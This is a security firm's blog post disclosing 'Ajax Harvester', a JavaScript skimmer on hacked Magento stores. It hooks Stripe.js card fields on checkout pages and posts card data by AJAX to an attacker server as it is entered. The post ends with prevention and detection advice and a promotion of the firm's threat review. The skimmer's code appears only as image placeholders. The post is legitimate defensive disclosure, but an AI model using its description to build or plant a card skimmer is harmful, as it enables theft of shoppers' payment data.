Foregenix Blog

New JavaScript Malware Targeting Stripe.js on Magento Websites - Ajax Harvester

Posted by Mike Hinton on 04/04/17 07:53

The Foregenix DFIR team has discovered what is believed to be a unreported piece of malware which has recently been used to target insecure eCommerce websites processing through Stripe, running on the Magento framework.

The Malware

Dubbed ‘Ajax Harvester’ by analysts, the malware is a piece of JavaScript which, when inserted into a compromised site, waits until a Magento payment page is visited. It specifically looks for payment pages using the One Page, CheckoutSuite, One Step Checkout and Fire Checkout page titles, as shown below.

Ajax Harvester - Stripe 1.png

If a payment page is identified it calls a further JavaScript (in this instance named ‘extra.js’) which searches for input fields specifically related to the now deprecated, although still widely used, ‘stripe.js’ Magento payment integration. Some of the malicious code is shown below.

Ajax Harvester - Stripe 2.png

Although the malware is not unique in its functionality it does mean users could have their credit card data stolen even before they have pressed the checkout button. Rather than harvesting code to a local harvest file for later retrieval by the attacker, it immediately posts the data using a JQuery AJAX function to an external server controlled by the attacker as soon as values have been entered into an input field. 

What does make the malware distinct is the fact that it is directly targeting the Stripe.js code for Magento. 

Prevention

This attack is only possible when a website is insecure - just to be clear, while this attack focuses on the Stripe.js integration for Magento, it can only take place when the website itself has been hacked.  Preventing this attack therefore requires a website administrator/web developer to keep the website secure.  Here's an article we recently wrote on Securing Your Magento Website.

Detection

In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.

You can detect these by using a free Guided Threat Review from the Foregenix team. 

Guided Website Threat Review

 

Topics: web security, Magento, malware, JavaScript